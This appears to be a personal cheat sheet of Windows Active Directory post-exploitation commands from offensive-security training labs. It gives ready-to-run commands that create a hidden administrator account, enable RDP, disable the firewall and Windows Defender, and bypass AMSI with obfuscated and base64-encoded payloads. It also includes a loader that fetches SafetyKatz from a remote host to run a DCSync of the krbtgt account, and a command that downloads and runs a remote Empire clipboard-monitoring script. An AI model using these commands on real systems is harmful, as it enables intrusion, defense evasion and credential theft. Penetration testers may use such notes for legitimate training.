πͺ Active DirectoryPost Exploitation Active Directory Post Exploitation Checklists
RDP Stuff
Add Local Administrator
Create user asuka and add to RDP, Admin, and WinRM.
Copy net user asuka 'TrYh@rdeR!' / add
net localgroup "Remote Desktop Users" asuka / add
net localgroup "Administrators" asuka / add
net localgroup "Remote Management Users" asuka / add
Enable RDP Access
Copy Set-ItemProperty - Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -
name "fDenyTSConnections" - value 0
Enable-NetFirewallRule - DisplayGroup "Remote Desktop"
# In case powershell is not enabled (like in old machine)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f
netsh advfirewall firewall set rule group = "remote desktop" new enable = Yes
Access RDP
Copy xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p: 'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/
rdesktop support.htb
# fix ERRCONNECT_TLS_CONNECT_FAILED
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p: 'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/ /tls-seclevel:0
Defender and Firewall Stuff
Turn Off Firewall
Copy # powershell
Set-NetFirewallProfile - Profile Domain , Public , Private - Enabled False
# cmd
netsh advfirewall set allprofiles state off
Disable Defender Real Time Monitoring
Copy # Remove Defender Database
cmd / c "C:\Program Files\Windows Defender\MpCmdRun.exe" - RemoveDefinitions - All
Get-MpComputerStatus
Set-MpPreference - DisableRealtimeMonitoring $true
Set-MpPreference - DisableIOAVProtection $true
Set-MpPreference - ExclusionExtension "ps1"
Set-MPPreference - DisableBehaviorMonitoring $true
# Disable AMSI (set to 0 to enable)
Set-MpPreference - DisableScriptScanning 1
# Check all exclusion folder
Get-MpPreference | Select-Object - Property ExclusionPath - ExpandProperty ExclusionPath
# Add folder exclusion (in case tamper protection is enabled)
Add-MpPreference - ExclusionPath C:\Mimikatz\
# Disable Real Time Protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" / f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" / v "DisableAntiSpyware" / t REG_DWORD / d "1" / f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" / v "DisableAntiVirus" / t REG_DWORD / d "1" / f
Bypassing PowerShell Security
Using InviShell - https://github.com/OmerYa/Invisi-Shell
Copy C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
AMSI Bypass
Detection: https://github.com/RythmStick/AMSITrigger
2023 CRTP Base64
Copy $a = 'si' ;$b = 'Am' ;$Ref = [ Ref ].Assembly.GetType(( 'System.Management.Automation.{0}{1}Utils' -f $b , $a)); $z = $Ref.GetField(( 'am{0}InitFailed' -f $a) , 'NonPublic,Static' );$z.SetValue( $null , $true )
Copy S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Copy [ Ref ].Assembly.GetType( 'System.Management.Automation.' +$ ([ Text.Encoding ]::Unicode.GetString([ Convert ]::FromBase64String( 'QQBtAHMAaQBVAHQAaQBsAHMA' )))).GetField( $ ([ Text.Encoding ]::Unicode.GetString([ Convert ]::FromBase64String( 'YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA==' ))) , 'NonPublic,Static' ).SetValue( $null , $true )
OPSEC with Loader
Copy C:\AD\Tools\ Loader.exe - path http: // 172.16 . 100.67 / SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
Get-ClipboardContents
Monitors the clipboard on a specified interval for changes to copied text.
Copy iex (iwr - usebasicparsing https: // raw.githubusercontent.com / EmpireProject / Empire / master /data/ module_source / collection / Get-ClipboardContents.ps1 ); Get-ClipboardContents
WADComs
WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.
Dump Saved Password
TCP Port Scanner
Copy 1 .. 1024 | % {echo (( new-object Net.Sockets.TcpClient).Connect( "172.16.8.1" , $_ )) "Port $_ is open!" } 2> $null # powershell
Ping Sweep
Copy for / l % i in ( 1 , 1 , 254 ) do @ping - n 1 - w 100 172.16 . 8 . % i > nul && echo 172.16 . 8 . % i is up. # cmd
Inveigh
Responder, but in Powershell/C#
MDE Enum
How to extract Windows Defender Exclusions and Attack Surface Reduction (ASR) rules without Admin privileges
Copy # local
mde-enum.exe /local /paths /access
# remote
mde-enum.exe < i p > < usernam e > < passwor d > < domai n > /paths
# i.e
. \ mde-enum.exe 172.16.8.148 asuka Asuka@1337 child.zerobyte.lab /paths
Or, use this Powershell script.
Copy $logName = "Microsoft-Windows-Windows Defender/Operational"
$eventID = 5007
$events = Get-WinEvent - LogName $logName | Where-Object { $_.Id -eq $eventID }
$exclusionEvents = $events | Where-Object { $_.Message -match "Exclusions" }
$pattern = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\[^\s]+"
$exclusionEvents | ForEach-Object {
if ( $_.Message -match $pattern) {
$matches [ 0 ]
}
}
Reference:
Other Useful Stuff
Last updated 3 months ago